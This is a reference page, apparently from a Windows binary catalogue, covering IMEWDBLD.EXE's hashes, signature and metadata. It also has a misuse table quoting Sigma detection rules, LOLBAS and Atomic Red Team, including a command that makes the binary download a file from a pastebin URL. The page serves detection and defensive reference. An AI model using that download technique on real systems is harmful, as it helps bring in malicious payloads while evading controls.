IMEWDBLD.EXE

  • File Path: C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE
  • Description: Microsoft IME Open Extended Dictionary Module

Screenshot

IMEWDBLD.EXE

Hashes

Type Hash
MD5 CB30AD795C9B30E71EB1E596D18B7A21
SHA1 BFF2D944ABDB28691369B71D3BA630781518501C
SHA256 60A1DCB12E65E0BD9E413AD48DF21A7753A90E7A60BD04F2865C55148818120F
SHA384 F5BA656EFE77998AAD5FC3FD5A11A83CB53C7FB9242511F371C1B8ECB8D99255351BAE8F36E0F1841B8BF1B1765734D5
SHA512 B3C535E27FC362365132ED2DA635B8EA557D29E29EAABD11C873FA9FE5AD7A949271C54D950FCFB9448FB7D7B2557922DAE3A197AFE01DE40A38BAF73FCCB947
SSDEEP 6144:58nhIq/0CaKkuYTVK1QsfjIbTGsBmR7Gs/UEVTppkX+:mnqgrfkuYTVcQsfezmR7Gs/r

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: imewdbld.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.18362.1 (WinBuild.160101.0800)
  • Product Version: 10.0.18362.1
  • Language: Language Neutral
  • Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File Score
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE 38
C:\Windows\system32\IME\shared\IMEWDBLD.EXE 43
C:\Windows\system32\IME\SHARED\IMEWDBLD.EXE 44
C:\Windows\SysWOW64\IME\shared\IMEWDBLD.EXE 38
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 41
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 36
C:\windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 32
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 36
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 36

Possible Misuse

The following table contains possible examples of IMEWDBLD.EXE being misused. While IMEWDBLD.EXE is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma net_connection_win_imewdbld.yml title: Download a File with IMEWDBLD.exe DRL 1.0
sigma net_connection_win_imewdbld.yml description: Use IMEWDBLD.exe (built-in to windows) to download a file DRL 1.0
sigma net_connection_win_imewdbld.yml Image\|endswith: '\IMEWDBLD.exe' DRL 1.0
LOLBAS IMEWDBLD.yml Name: IMEWDBLD.exe  
LOLBAS IMEWDBLD.yml - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw  
LOLBAS IMEWDBLD.yml Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>  
LOLBAS IMEWDBLD.yml - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe  
atomic-red-team index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1105.md - Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md ## Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. MIT License. © 2018 Red Canary
atomic-red-team T1105.md $imewdbled = $env:SystemRoot + “\System32\IME\SHARED\IMEWDBLD.exe” MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.